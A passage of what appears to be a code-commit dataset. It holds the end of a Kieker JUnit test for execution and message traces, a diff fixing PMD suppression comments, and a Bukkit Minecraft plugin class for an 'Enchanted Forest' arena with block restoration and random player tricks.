ExecutionTrace class with two equal * traces. * * @throws InvalidTraceException */ @Test public void testEqualMethodEqualTraces() throws InvalidTraceException { final ExecutionTrace execTrace1 = this.genValidBookstoreTrace(); final ExecutionTrace execTrace2 = this.genValidBookstoreTrace(); Assert.assertEquals(execTrace1, execTrace2); } /** * Tests the equals method of the ExecutionTrace class with two different * traces. * * @throws InvalidTraceException */ @Test public void testEqualMethodDifferentTraces() throws InvalidTraceException { final ExecutionTrace execTrace1 = this.genValidBookstoreTrace(); final ExecutionTrace execTrace2 = this.genBrokenBookstoreTraceEoiSkip(); Assert.assertFalse(execTrace1.equals(execTrace2)); } private enum VariationPoint { OPERATION, ALLOCATION, TRACE_ID, SESSION_ID, EOI, ESS, TIN, TOUT }; /** * Returns an {@link Execution} with each field being equal to that of <i>executionTemplate</i> except for the value * of the given {@link VariationPoint} being set to the respective value of <i>variationTemplate</i>. * * @param executionTemplate * @param vPoint * @param variationTemplate * @return */ private Execution cloneExecutionWithVariation(final Execution executionTemplate, final VariationPoint vPoint, final Execution variationTemplate) { Operation op = executionTemplate.getOperation(); AllocationComponent allocComp = executionTemplate.getAllocationComponent(); long traceId = executionTemplate.getTraceId(); String sessionId = executionTemplate.getSessionId(); int eoi = executionTemplate.getEoi(); int ess = executionTemplate.getEss(); long tin = executionTemplate.getTin(); long tout = executionTemplate.getTout(); final boolean assumed = executionTemplate.isAssumed(); /* Now perform the selected variation */ switch (vPoint) { case ALLOCATION: allocComp = variationTemplate.getAllocationComponent(); break; case EOI: eoi = variationTemplate.getEoi(); break; case ESS: ess = variationTemplate.getEss(); break; case OPERATION: op = variationTemplate.getOperation(); break; case SESSION_ID: sessionId = variationTemplate.getSessionId(); break; case TIN: tin = variationTemplate.getTin(); break; case TOUT: tout = variationTemplate.getTout(); break; case TRACE_ID: traceId = variationTemplate.getTraceId(); break; default: Assert.fail(); } final Execution retVal = new Execution(op, allocComp, traceId, sessionId, eoi, ess, tin, tout, assumed); Assert.assertFalse("executions must vary in " + vPoint + " but are equal: " + executionTemplate + " ; " + retVal, retVal.equals(executionTemplate)); return retVal; } @Test public void testExecutionTraceEqualMethod() throws InvalidTraceException { final ExecutionTrace trace0 = this.genValidBookstoreTrace(); /** * Will be used to create a clone of exec0_0__bookstore_searchBook with certain variations * selected from the execution. */ final Execution variationTemplate = new Execution(this.exec1_1__catalog_getBook.getOperation(), this.exec1_1__catalog_getBook.getAllocationComponent(), this.exec1_1__catalog_getBook.getTraceId() + 100, this.exec1_1__catalog_getBook.getSessionId() + "_", this.exec1_1__catalog_getBook.getEoi() + 100, this.exec1_1__catalog_getBook.getEss() + 100, this.exec1_1__catalog_getBook.getTin() + 100, this.exec1_1__catalog_getBook.getTout(), !this.exec1_1__catalog_getBook.isAssumed()); vLoop: for (final VariationPoint vPoint : VariationPoint.values()) { final ExecutionTrace trace1 = new ExecutionTrace(trace0.getTraceId(), trace0.getSessionId()); for (final Execution execFromTrace0 : trace0.getTraceAsSortedExecutionSet()) { final Execution execToAddToTrace1; if (execFromTrace0 == this.exec0_0__bookstore_searchBook) { execToAddToTrace1 = this.cloneExecutionWithVariation(this.exec0_0__bookstore_searchBook, vPoint, variationTemplate); // This tests the Execution's equals method already Assert.assertFalse("Executions must not be equal (variation point: " + vPoint + " ) but they are: " + execFromTrace0 + "; " + execToAddToTrace1, execFromTrace0.equals(execToAddToTrace1)); if (vPoint == VariationPoint.TRACE_ID) { // We won't be able to continue for this variation because we cannot add an execution // with a varying trace id. However, at least we've tested the Execution's equal method. continue vLoop; } } else { execToAddToTrace1 = execFromTrace0; } trace1.add(execToAddToTrace1); } Assert.assertFalse("Execution traces must not be equal (variation point: " + vPoint + " ) but they are: " + trace0 + "; " + trace1, trace0.equals(trace1)); } } /** * This method can be used to debug the {@link java.util.Comparator} provided by {@link ExecutionTrace#createExecutionTraceComparator()}. */ @Test public void testTreeSet() { final SortedSet<Execution> s0 = new TreeSet<Execution>(ExecutionTrace.createExecutionTraceComparator()); final SortedSet<Execution> s1 = new TreeSet<Execution>(ExecutionTrace.createExecutionTraceComparator()); final Execution execFromTrace0 = this.exec0_0__bookstore_searchBook; final Execution long1 = new Execution(execFromTrace0.getOperation(), execFromTrace0.getAllocationComponent(), execFromTrace0.getTraceId(), execFromTrace0.getSessionId(), execFromTrace0.getEoi(), execFromTrace0.getEss(), execFromTrace0.getTin(), execFromTrace0.getTout(), execFromTrace0.isAssumed()); s0.add(execFromTrace0); s1.add(long1); Assert.assertEquals("Expected sets to be equal", s0, s1); } /** * Tests whether the "well-known" Bookstore trace can be correctly transformed * from an Execution Trace representation into a Message Trace representation. * * @throws InvalidTraceException */ @Test public void testMessageTraceTransformationValidTrace() throws InvalidTraceException { final ExecutionTrace executionTrace = this.genValidBookstoreTrace(); /* * Transform Execution Trace to Message Trace representation */ final MessageTrace messageTrace = executionTrace.toMessageTrace(SystemModelRepository.ROOT_EXECUTION); /* * Validate Message Trace representation. */ Assert.assertEquals("Invalid traceId", messageTrace.getTraceId(), TestExecutionTraceBookstore.TRACE_ID); final List<AbstractMessage> msgVector = messageTrace.getSequenceAsVector(); Assert.assertEquals("Invalid number of messages in trace", msgVector.size(), this.numExecutions * 2); final AbstractMessage[] msgArray = msgVector.toArray(new AbstractMessage[msgVector.size()]); Assert.assertEquals(msgArray.length, this.numExecutions * 2); int curIdx = 0; { /* 1.: [0,0].Call $->bookstore.searchBook(..) */// NOCS final AbstractMessage call0_0___root__bookstore_searchBook = msgArray[curIdx++]; // NOCS Assert.assertTrue("Message is not a call", call0_0___root__bookstore_searchBook instanceof SynchronousCallMessage); // NOPMD (String repeat) Assert.assertEquals("Sending execution is not root execution", call0_0___root__bookstore_searchBook.getSendingExecution(), SystemModelRepository.ROOT_EXECUTION); Assert.assertEquals(call0_0___root__bookstore_searchBook.getReceivingExecution(), this.exec0_0__bookstore_searchBook); Assert.assertEquals("Message has wrong timestamp", call0_0___root__bookstore_searchBook.getTimestamp(), this.exec0_0__bookstore_searchBook.getTin()); // NOPMD } { /* 2.: [1,1].Call bookstore.searchBook(..)->catalog.getBook(..) */// NOCS final AbstractMessage call1_1___bookstore_searchBook_catalog_getBook = msgArray[curIdx++]; // NOCS Assert.assertTrue("Message is not a call", call1_1___bookstore_searchBook_catalog_getBook instanceof SynchronousCallMessage); Assert.assertEquals(call1_1___bookstore_searchBook_catalog_getBook.getSendingExecution(), this.exec0_0__bookstore_searchBook); Assert.assertEquals(call1_1___bookstore_searchBook_catalog_getBook.getReceivingExecution(), this.exec1_1__catalog_getBook); Assert.assertEquals("Message has wrong timestamp", call1_1___bookstore_searchBook_catalog_getBook.getTimestamp(), this.exec1_1__catalog_getBook.getTin()); } { /* 2.: [1,1].Return catalog.getBook(..)->bookstore.searchBook(..) */// NOCS final AbstractMessage return1_1___catalog_getBook__bookstore_searchBook = msgArray[curIdx++]; // NOCS Assert.assertTrue("Message is not a reply", return1_1___catalog_getBook__bookstore_searchBook instanceof SynchronousReplyMessage); Assert.assertEquals(return1_1___catalog_getBook__bookstore_searchBook.getSendingExecution(), this.exec1_1__catalog_getBook); Assert.assertEquals(return1_1___catalog_getBook__bookstore_searchBook.getReceivingExecution(), this.exec0_0__bookstore_searchBook); Assert.assertEquals("Message has wrong timestamp", return1_1___catalog_getBook__bookstore_searchBook.getTimestamp(), this.exec1_1__catalog_getBook.getTout()); } { /* 3.: [2,1].Call bookstore.searchBook(..)->crm.getOrders(..) */// NOCS final AbstractMessage call2_1___bookstore_searchBook__crm_getOrders = msgArray[curIdx++]; // NOCS Assert.assertTrue("Message is not a call", call2_1___bookstore_searchBook__crm_getOrders instanceof SynchronousCallMessage); Assert.assertEquals(call2_1___bookstore_searchBook__crm_getOrders.getSendingExecution(), this.exec0_0__bookstore_searchBook); Assert.assertEquals(call2_1___bookstore_searchBook__crm_getOrders.getReceivingExecution(), this.exec2_1__crm_getOrders); Assert.assertEquals("Message has wrong timestamp", call2_1___bookstore_searchBook__crm_getOrders.getTimestamp(), this.exec2_1__crm_getOrders.getTin()); } { /* 4.: [3,2].Call crm.getOrders(..)->catalog.getBook(..) */// NOCS final AbstractMessage call3_2___bookstore_searchBook__catalog_getBook = msgArray[curIdx++]; // NOCS Assert.assertTrue("Message is not a call", call3_2___bookstore_searchBook__catalog_getBook instanceof SynchronousCallMessage); Assert.assertEquals(call3_2___bookstore_searchBook__catalog_getBook.getSendingExecution(), this.exec2_1__crm_getOrders); Assert.assertEquals(call3_2___bookstore_searchBook__catalog_getBook.getReceivingExecution(), this.exec3_2__catalog_getBook); Assert.assertEquals("Message has wrong timestamp", call3_2___bookstore_searchBook__catalog_getBook.getTimestamp(), this.exec3_2__catalog_getBook.getTin()); } { /* 5.: [3,2].Return catalog.getBook(..)->crm.getOrders(..) */// NOCS final AbstractMessage return3_2___catalog_getBook__crm_getOrders = msgArray[curIdx++]; // NOCS Assert.assertTrue("Message is not a reply", return3_2___catalog_getBook__crm_getOrders instanceof SynchronousReplyMessage); Assert.assertEquals(return3_2___catalog_getBook__crm_getOrders.getSendingExecution(), this.exec3_2__catalog_getBook); Assert.assertEquals(return3_2___catalog_getBook__crm_getOrders.getReceivingExecution(), this.exec2_1__crm_getOrders); Assert.assertEquals("Message has wrong timestamp", return3_2___catalog_getBook__crm_getOrders.getTimestamp(), this.exec3_2__catalog_getBook.getTout()); } { /* 6.: [2,1].Return crm.getOrders(..)->bookstore.searchBook */// NOCS final AbstractMessage return2_1___crm_getOrders__bookstore_searchBook = msgArray[curIdx++]; // NOCS Assert.assertTrue("Message is not a reply", return2_1___crm_getOrders__bookstore_searchBook instanceof SynchronousReplyMessage); Assert.assertEquals(return2_1___crm_getOrders__bookstore_searchBook.getSendingExecution(), this.exec2_1__crm_getOrders); Assert.assertEquals(return2_1___crm_getOrders__bookstore_searchBook.getReceivingExecution(), this.exec0_0__bookstore_searchBook); Assert.assertEquals("Message has wrong timestamp", return2_1___crm_getOrders__bookstore_searchBook.getTimestamp(), this.exec2_1__crm_getOrders.getTout()); } } /** * Make sure that the transformation from an Execution Trace to a Message * Trace is performed only once. * * @throws InvalidTraceException */ @Test public void testMessageTraceTransformationOnlyOnce() throws InvalidTraceException { final ExecutionTrace executionTrace = this.genValidBookstoreTrace(); /* * Transform Execution Trace to Message Trace representation (twice) * and make sure, that the instances are the same. */ final MessageTrace messageTrace1 = executionTrace.toMessageTrace(SystemModelRepository.ROOT_EXECUTION); final MessageTrace messageTrace2 = executionTrace.toMessageTrace(SystemModelRepository.ROOT_EXECUTION); Assert.assertSame(messageTrace1, messageTrace2); } /** * Make sure that the transformation from an Execution Trace to a Message * Trace is performed only once. * * @throws InvalidTraceException */ @Test public void testMessageTraceTransformationTwiceOnChange() throws InvalidTraceException { final ExecutionTrace executionTrace = this.genValidBookstoreTrace(); final Execution exec4_1__catalog_getBook = this.eFactory // NOCS .genExecution("Catalog", "catalog", "getBook", TestExecutionTraceBookstore.TRACE_ID, TestExecutionTraceBookstore.SESSION_ID, 9, 10, 4, 1); final MessageTrace messageTrace1 = executionTrace.toMessageTrace(SystemModelRepository.ROOT_EXECUTION); executionTrace.add(exec4_1__catalog_getBook); final MessageTrace messageTrace2 = executionTrace.toMessageTrace(SystemModelRepository.ROOT_EXECUTION); Assert.assertNotSame(messageTrace1, messageTrace2); } /** * Creates a broken execution trace version of the "well-known" Bookstore * trace leads to an exception. * * The trace is broken in that the eoi/ess values of an execution with eoi/ess * [1,1] are replaced by the eoi/ess values [1,3]. Since ess values must only * increment/decrement by 1, this test must lead to an exception. * * @return * @throws InvalidTraceException */ private ExecutionTrace genBrokenBookstoreTraceEssSkip() throws InvalidTraceException { /* * Create an Execution Trace and add Executions in * arbitrary order */ final ExecutionTrace executionTrace = new ExecutionTrace(TestExecutionTraceBookstore.TRACE_ID, TestExecutionTraceBookstore.SESSION_ID); final Execution exec1_1__catalog_getBook__broken = this.eFactory.genExecution("Catalog", "catalog", "getBook", TestExecutionTraceBookstore.TRACE_ID, // NOCS TestExecutionTraceBookstore.SESSION_ID, 2, 4, 1, 3); // NOCS Assert.assertFalse("Invalid test", exec1_1__catalog_getBook__broken.equals(this.exec1_1__catalog_getBook)); executionTrace.add(this.exec3_2__catalog_getBook); executionTrace.add(this.exec2_1__crm_getOrders); executionTrace.add(this.exec0_0__bookstore_searchBook); executionTrace.add(exec1_1__catalog_getBook__broken); return executionTrace; } /** * Assert that the transformation of a broken execution trace version of the * "well-known" Bookstore trace leads to an exception. * * The trace is broken in that the eoi/ess values of an execution with eoi/ess * [1,1] are replaced by the eoi/ess values [1,3]. Since ess values must only * increment/decrement by 1, this test must lead to an exception. * * @throws InvalidTraceException */ @Test public void testMessageTraceTransformationBrokenTraceEssSkip() throws InvalidTraceException { final ExecutionTrace executionTrace = this.genBrokenBookstoreTraceEssSkip(); /** * Transform Execution Trace to Message Trace representation */ try { /* The following call must throw an Exception in this test case */ TestExecutionTraceBookstore.LOG.info("This test triggers a FATAL warning about an ess skip <0,3> which can simply be ignored because it is desired"); executionTrace.toMessageTrace(SystemModelRepository.ROOT_EXECUTION); Assert.fail("An invalid execution has been transformed to a message trace"); } catch (final InvalidTraceException ex) { // NOPMD /* we wanted this exception to happen */ } } /** * Creates a broken execution trace version of the "well-known" Bookstore * trace leads to an exception. * * The trace is broken in that the eoi/ess values of an execution with eoi/ess * [3,2] are replaced by the eoi/ess values [4,2]. Since eoi values must only * increment by 1, this test must lead to an exception. * * @return * @throws InvalidTraceException */ private ExecutionTrace genBrokenBookstoreTraceEoiSkip() throws InvalidTraceException { /* * Create an Execution Trace and add Executions in * arbitrary order */ final ExecutionTrace executionTrace = new ExecutionTrace(TestExecutionTraceBookstore.TRACE_ID, TestExecutionTraceBookstore.SESSION_ID); final Execution exec3_2__catalog_getBook__broken = this.eFactory.genExecution("Catalog", "catalog", "getBook", TestExecutionTraceBookstore.TRACE_ID, // NOCS TestExecutionTraceBookstore.SESSION_ID, 6, 7, 4, 2); Assert.assertFalse("Invalid test", exec3_2__catalog_getBook__broken.equals(this.exec3_2__catalog_getBook)); executionTrace.add(exec3_2__catalog_getBook__broken); executionTrace.add(this.exec2_1__crm_getOrders); executionTrace.add(this.exec0_0__bookstore_searchBook); executionTrace.add(this.exec1_1__catalog_getBook); return executionTrace; } /** * Assert that the transformation of a broken execution trace version of the * "well-known" Bookstore trace leads to an exception. * * The trace is broken in that the eoi/ess values of an execution with eoi/ess * [3,2] are replaced by the eoi/ess values [4,2]. Since eoi values must only * increment by 1, this test must lead to an exception. * * @throws InvalidTraceException */ @Test public void testMessageTraceTransformationBrokenTraceEoiSkip() throws InvalidTraceException { /* * Create an Execution Trace and add Executions in * arbitrary order */ final ExecutionTrace executionTrace = this.genBrokenBookstoreTraceEoiSkip(); /** * Transform Execution Trace to Message Trace representation */ try { /* The following call must throw an Exception in this test case */ executionTrace.toMessageTrace(SystemModelRepository.ROOT_EXECUTION); Assert.fail("An invalid execution has been transformed to a message trace"); } catch (final InvalidTraceException ex) { // NOPMD /* we wanted this exception to happen */ } } }
aaaaaaaaaaaaaaaaaaaaaaaaah: fixed PMD issues
test/tools/kieker/test/tools/junit/traceAnalysis/systemModel/TestExecutionTraceBookstore.java
aaaaaaaaaaaaaaaaaaaaaaaaah: fixed PMD issues
<ide><path>est/tools/kieker/test/tools/junit/traceAnalysis/systemModel/TestExecutionTraceBookstore.java <ide> private volatile int numExecutions; <ide> <ide> /* Executions of a valid trace */ <del> private volatile Execution exec0_0__bookstore_searchBook; // NOCS // NOMPD (VariableNamingConventions) <del> private volatile Execution exec1_1__catalog_getBook; // NOCS // NOMPD (VariableNamingConventions) <del> private volatile Execution exec2_1__crm_getOrders; // NOCS // NOMPD (VariableNamingConventions) <del> private volatile Execution exec3_2__catalog_getBook; // NOCS // NOMPD (VariableNamingConventions) <add> private volatile Execution exec0_0__bookstore_searchBook; // NOCS // NOPMD (VariableNamingConventions) <add> private volatile Execution exec1_1__catalog_getBook; // NOCS // NOPMD (VariableNamingConventions) <add> private volatile Execution exec2_1__crm_getOrders; // NOCS // NOPMD (VariableNamingConventions) <add> private volatile Execution exec3_2__catalog_getBook; // NOCS // NOPMD (VariableNamingConventions) <ide> <ide> // public TestExecutionTraceBookstore() { <ide> //
Java
agpl-3.0
86b4a56e3354836c3d40adebf91187de2f060f9c
0
Skelril/Aurora
package com.skelril.aurora.city.engine.arena; import com.google.common.collect.Lists; import com.sk89q.commandbook.CommandBook; import com.sk89q.worldedit.BlockVector; import com.sk89q.worldedit.blocks.BaseBlock; import com.sk89q.worldedit.blocks.BlockID; import com.sk89q.worldedit.blocks.BlockType; import com.sk89q.worldedit.blocks.ItemID; import com.sk89q.worldguard.protection.regions.ProtectedRegion; import com.skelril.aurora.SacrificeComponent; import com.skelril.aurora.admin.AdminComponent; import com.skelril.aurora.events.EggHatchEvent; import com.skelril.aurora.util.ChanceUtil; import com.skelril.aurora.util.ChatUtil; import com.skelril.aurora.util.EnvironmentUtil; import com.skelril.aurora.util.LocationUtil; import org.bukkit.ChatColor; import org.bukkit.Location; import org.bukkit.Server; import org.bukkit.World; import org.bukkit.block.Block; import org.bukkit.command.CommandSender; import org.bukkit.entity.EntityType; import org.bukkit.entity.Item; import org.bukkit.entity.Player; import org.bukkit.entity.Slime; import org.bukkit.event.EventHandler; import org.bukkit.event.EventPriority; import org.bukkit.event.Listener; import org.bukkit.event.block.BlockBreakEvent; import org.bukkit.event.block.BlockPlaceEvent; import org.bukkit.event.block.LeavesDecayEvent; import org.bukkit.event.entity.ItemSpawnEvent; import org.bukkit.event.player.PlayerBucketEmptyEvent; import org.bukkit.event.player.PlayerBucketFillEvent; import org.bukkit.event.player.PlayerDropItemEvent; import org.bukkit.inventory.ItemStack; import org.bukkit.inventory.PlayerInventory; import org.bukkit.inventory.meta.PotionMeta; import org.bukkit.potion.Potion; import org.bukkit.potion.PotionEffect; import org.bukkit.potion.PotionEffectType; import org.bukkit.potion.PotionType; import org.bukkit.util.Vector; import java.util.*; import java.util.concurrent.ConcurrentHashMap; import java.util.logging.Logger; /** * Author: Turtle9598 */ public class EnchantedForest extends AbstractRegionedArena implements MonitoredArena, Listener { private final CommandBook inst = CommandBook.inst(); private final Logger log = inst.getLogger(); private final Server server = CommandBook.server(); private AdminComponent adminComponent; private final Random random = new Random(); private ConcurrentHashMap<Location, AbstractMap.SimpleEntry<Long, BaseBlock>> map = new ConcurrentHashMap<>(); public EnchantedForest(World world, ProtectedRegion region, AdminComponent adminComponent) { super(world, region); this.adminComponent = adminComponent; //noinspection AccessStaticViaInstance inst.registerEvents(this); } @Override public void forceRestoreBlocks() { BaseBlock b; for (Map.Entry<Location, AbstractMap.SimpleEntry<Long, BaseBlock>> e : map.entrySet()) { b = e.getValue().getValue(); if (!e.getKey().getChunk().isLoaded()) e.getKey().getChunk().load(); e.getKey().getBlock().setTypeIdAndData(b.getType(), (byte) b.getData(), true); } map.clear(); } @Override public void run() { equalize(); restoreBlocks(); } @Override public void disable() { forceRestoreBlocks(); } @Override public String getId() { return getRegion().getId(); } @Override public void equalize() { for (Player player : getContainedPlayers()) { try { adminComponent.deadmin(player); } catch (Exception e) { log.warning("The player: " + player.getName() + " may have an unfair advantage."); } } } @Override public ArenaType getArenaType() { return ArenaType.MONITORED; } public void restoreBlocks() { int min = 1000 * 60 * 170; BaseBlock b; Map.Entry<Location, AbstractMap.SimpleEntry<Long, BaseBlock>> e; Iterator<Map.Entry<Location,AbstractMap.SimpleEntry<Long,BaseBlock>>> it = map.entrySet().iterator(); while(it.hasNext()) { e = it.next(); if ((System.currentTimeMillis() - e.getValue().getKey()) > min) { b = e.getValue().getValue(); if (!e.getKey().getChunk().isLoaded()) e.getKey().getChunk().load(); e.getKey().getBlock().setTypeIdAndData(b.getType(), (byte) b.getData(), true); it.remove(); } else if (System.currentTimeMillis() - e.getValue().getKey() > (min / 20) && EnvironmentUtil.isShrubBlock(e.getValue().getValue().getType())) { b = e.getValue().getValue(); if (!e.getKey().getChunk().isLoaded()) e.getKey().getChunk().load(); e.getKey().getBlock().setTypeIdAndData(b.getType(), (byte) b.getData(), true); it.remove(); } } } private List<ItemStack> getRandomDropSet(CommandSender player) { // Create the Sacrifice int amt, value; if (ChanceUtil.getChance(59)) { amt = 64; value = 5248; } else { amt = 8; value = 88; } // Sacrifice and make loot list List<ItemStack> loot; do { loot = SacrificeComponent.getCalculatedLoot(player, amt, value); } while (loot == null || loot.size() < 1); // Shuffle and return loot for variety Collections.shuffle(loot); return loot; } private void eatFood(Player player) { if (player.getSaturation() - 1 >= 0) { player.setSaturation(player.getSaturation() - 1); } else if (player.getFoodLevel() - 1 >= 0) { player.setFoodLevel(player.getFoodLevel() - 1); } } private void trick(final Player player) { if (ChanceUtil.getChance(256)) { final PlayerInventory pInv = player.getInventory(); switch (ChanceUtil.getRandom(3)) { case 1: boolean hasAxe = true; switch (pInv.getItemInHand().getTypeId()) { case ItemID.DIAMOND_AXE: pInv.addItem(new ItemStack(ItemID.DIAMOND, 2), new ItemStack(ItemID.STICK, 2)); break; case ItemID.GOLD_AXE: pInv.addItem(new ItemStack(ItemID.GOLD_BAR, 2), new ItemStack(ItemID.STICK, 2)); break; case ItemID.IRON_AXE: pInv.addItem(new ItemStack(ItemID.IRON_BAR, 2), new ItemStack(ItemID.STICK, 2)); break; case ItemID.WOOD_AXE: pInv.addItem(new ItemStack(BlockID.WOOD, 2), new ItemStack(ItemID.STICK, 2)); break; default: hasAxe = false; ChatUtil.sendWarning(player, "The fairy couldn't find an axe and instead throws a rock" + "at you."); player.damage(7); player.setVelocity(new Vector( random.nextDouble() * 2.0 - 1.5, random.nextDouble() * 1, random.nextDouble() * 2.0 - 1.5) ); } if (hasAxe) { ChatUtil.sendWarning(player, "The fairy breaks your axe."); server.getScheduler().runTaskLater(inst, new Runnable() { @Override public void run() { player.getInventory().setItemInHand(null); } }, 1); } break; case 2: // Make potion ItemStack potion = new Potion(PotionType.INSTANT_DAMAGE).toItemStack(1); PotionMeta pMeta = (PotionMeta) potion.getItemMeta(); pMeta.addCustomEffect( new PotionEffect(PotionEffectType.INCREASE_DAMAGE, 20 * 600, 2), false); pMeta.addCustomEffect( new PotionEffect(PotionEffectType.REGENERATION, 20 * 600, 2), false); pMeta.addCustomEffect( new PotionEffect(PotionEffectType.DAMAGE_RESISTANCE, 20 * 600, 2), false); pMeta.addCustomEffect( new PotionEffect(PotionEffectType.WATER_BREATHING, 20 * 600, 2), false); pMeta.addCustomEffect( new PotionEffect(PotionEffectType.FIRE_RESISTANCE, 20 * 600, 2), false); pMeta.setDisplayName(ChatColor.WHITE + "Extreme Combat Potion"); potion.setItemMeta(pMeta); // Give potion ChatUtil.sendWarning(player, "You might need this friend ;)"); getWorld().dropItemNaturally(player.getLocation(), potion); int waves = 5 * ChanceUtil.getRandom(3); for (int i = 0; i < waves; i++) { server.getScheduler().scheduleSyncDelayedTask(inst, new Runnable() { @Override public void run() { ChatUtil.sendNotice(getContainedPlayers(), "Slimes away guys!"); BlockVector min = getRegion().getMinimumPoint(); BlockVector max = getRegion().getMaximumPoint(); short sOut = 1000; com.sk89q.worldedit.Vector v; for (int i = 0; i < 25 * ChanceUtil.getRandom(4); i++) { sOut--; if (sOut < 0) break; v = LocationUtil.pickLocation(min.getX(), max.getX(), min.getZ(), max.getZ()); v = v.add(0, 83, 0); if (getRegion().contains(v.getBlockX(), v.getBlockY(), v.getBlockZ())) { Block b = getWorld().getBlockAt(v.getBlockX(), v.getBlockY(), v.getBlockZ()); if (b.getTypeId() == BlockID.AIR || EnvironmentUtil.isShrubBlock(b.getTypeId())) { Slime s = (Slime) getWorld().spawnEntity(b.getLocation(), EntityType.SLIME); s.setSize(ChanceUtil.getRandom(8)); s.setRemoveWhenFarAway(false); continue; } } i--; } } }, 20 * 7 * (i + 1)); } server.getScheduler().scheduleSyncDelayedTask(inst, new Runnable() { @Override public void run() { ChatUtil.sendNotice(getContainedPlayers(), "Release the god slime!"); BlockVector min = getRegion().getMinimumPoint(); BlockVector max = getRegion().getMaximumPoint(); short sOut = 1000; com.sk89q.worldedit.Vector v; for (int i = 0; i < ChanceUtil.getRandom(1); i++) { sOut--; if (sOut < 0) break; v = LocationUtil.pickLocation(min.getX(), max.getX(), min.getZ(), max.getZ()); v = v.add(0, 83, 0); if (getRegion().contains(v.getBlockX(), v.getBlockY(), v.getBlockZ())) { Block b = getWorld().getBlockAt(v.getBlockX(), v.getBlockY(), v.getBlockZ()); if (BlockType.canPassThrough(b.getTypeId())) { Slime s = (Slime) getWorld().spawnEntity(b.getLocation(), EntityType.SLIME); s.setSize(16); s.setRemoveWhenFarAway(false); continue; } } i--; } } }, 20 * 7 * (waves + 1)); break; case 3: List<ItemStack> toDrop = Lists.newArrayList(pInv.getArmorContents()); toDrop.addAll(Arrays.asList(pInv.getContents())); for (ItemStack aDrop : toDrop) { if (aDrop == null || aDrop.getTypeId() == BlockID.AIR) continue; Item item = getWorld().dropItem(player.getLocation(), aDrop); item.setVelocity(new Vector( random.nextDouble() * 2 - 1, random.nextDouble() * 1, random.nextDouble() * 2 - 1 )); } pInv.setArmorContents(null); pInv.clear(); ChatUtil.sendNotice(player, "The fair throws your stuff all over the place"); } } } @EventHandler(priority = EventPriority.HIGHEST, ignoreCancelled = true) public void onBlockBreak(BlockBreakEvent event) { final Player player = event.getPlayer(); final Block block = event.getBlock(); ItemStack itemInHand = player.getItemInHand(); if (!adminComponent.isAdmin(player) && contains(block) && (block.getTypeId() == BlockID.LOG || EnvironmentUtil.isShrubBlock(block)) && itemInHand != null) { if (block.getTypeId() == BlockID.LOG) { short c = 0; for (ItemStack aItemStack : getRandomDropSet(player)) { if (c >= 3) break; getWorld().dropItemNaturally(block.getLocation(), aItemStack); c++; } event.setExpToDrop(ChanceUtil.getRandom(4)); eatFood(player); trick(player); } map.put(block.getLocation(), new AbstractMap.SimpleEntry<>(System.currentTimeMillis(), new BaseBlock(block.getTypeId(), block.getData()))); } else if (contains(block)) { event.setCancelled(true); ChatUtil.sendWarning(player, "You cannot break this block for some reason."); } } @EventHandler(priority = EventPriority.MONITOR, ignoreCancelled = true) public void onLeafDecay(LeavesDecayEvent event) { if (contains(event.getBlock())) { Block block = event.getBlock(); map.put(block.getLocation(), new AbstractMap.SimpleEntry<>(System.currentTimeMillis(), new BaseBlock(block.getTypeId(), block.getData()))); if (!ChanceUtil.getChance(14)) return; getWorld().dropItemNaturally(block.getLocation(), getRandomDropSet(server.getConsoleSender()).get(0)); } } @EventHandler(ignoreCancelled = true) public void onItemSpawn(ItemSpawnEvent event) { if (contains(event.getEntity())) { for (Location l : map.keySet()) { if (l.getBlock().equals(event.getEntity().getLocation().getBlock())) { int is = event.getEntity().getItemStack().getTypeId(); if (is == BlockID.LOG || is == BlockID.SAPLING) { event.setCancelled(true); } return; } } } } @EventHandler(ignoreCancelled = true) public void onPlayerDropItem(PlayerDropItemEvent event) { if (contains(event.getItemDrop())) { for (Location l : map.keySet()) { if (event.getItemDrop().getLocation().getBlock().equals(l.getBlock())) { int is = event.getItemDrop().getItemStack().getTypeId(); if (is == BlockID.LOG || is == BlockID.SAPLING) { ChatUtil.sendError(event.getPlayer(), "You can't drop that here."); event.setCancelled(true); } return; } } } } @EventHandler(ignoreCancelled = true) public void onBlockPlace(BlockPlaceEvent event) { Player player = event.getPlayer(); if (!adminComponent.isAdmin(player) && contains(event.getBlock()) && !inst.hasPermission(player, "aurora.mine.builder")) { event.setCancelled(true); ChatUtil.sendNotice(player, ChatColor.DARK_RED, "You don't have permission for this area."); } } @EventHandler(priority = EventPriority.MONITOR, ignoreCancelled = true) public void onBucketFill(PlayerBucketFillEvent event) { if (contains(event.getBlockClicked())) { final Block block = event.getBlockClicked(); map.put(block.getLocation(), new AbstractMap.SimpleEntry<>(System.currentTimeMillis(), new BaseBlock(block.getTypeId(), block.getData()))); } } @EventHandler(ignoreCancelled = true) public void onBucketEmpty(PlayerBucketEmptyEvent event) { if (contains(event.getBlockClicked())) { event.setCancelled(true); ChatUtil.sendNotice(event.getPlayer(), ChatColor.DARK_RED, "You don't have permission for this area."); } } @EventHandler(ignoreCancelled = true) public void onEggHatch(EggHatchEvent event) { if (contains(event.getEgg())) event.setCancelled(true); } }
src/main/java/com/skelril/aurora/city/engine/arena/EnchantedForest.java
package com.skelril.aurora.city.engine.arena; import com.sk89q.commandbook.CommandBook; import com.sk89q.worldedit.BlockVector; import com.sk89q.worldedit.blocks.BaseBlock; import com.sk89q.worldedit.blocks.BlockID; import com.sk89q.worldedit.blocks.BlockType; import com.sk89q.worldedit.blocks.ItemID; import com.sk89q.worldguard.protection.regions.ProtectedRegion; import com.skelril.aurora.SacrificeComponent; import com.skelril.aurora.admin.AdminComponent; import com.skelril.aurora.events.EggHatchEvent; import com.skelril.aurora.util.ChanceUtil; import com.skelril.aurora.util.ChatUtil; import com.skelril.aurora.util.EnvironmentUtil; import com.skelril.aurora.util.LocationUtil; import org.bukkit.ChatColor; import org.bukkit.Location; import org.bukkit.Server; import org.bukkit.World; import org.bukkit.block.Block; import org.bukkit.command.CommandSender; import org.bukkit.entity.EntityType; import org.bukkit.entity.Player; import org.bukkit.entity.Slime; import org.bukkit.event.EventHandler; import org.bukkit.event.EventPriority; import org.bukkit.event.Listener; import org.bukkit.event.block.BlockBreakEvent; import org.bukkit.event.block.BlockPlaceEvent; import org.bukkit.event.block.LeavesDecayEvent; import org.bukkit.event.entity.ItemSpawnEvent; import org.bukkit.event.player.PlayerBucketEmptyEvent; import org.bukkit.event.player.PlayerBucketFillEvent; import org.bukkit.event.player.PlayerDropItemEvent; import org.bukkit.inventory.ItemStack; import org.bukkit.inventory.PlayerInventory; import org.bukkit.inventory.meta.PotionMeta; import 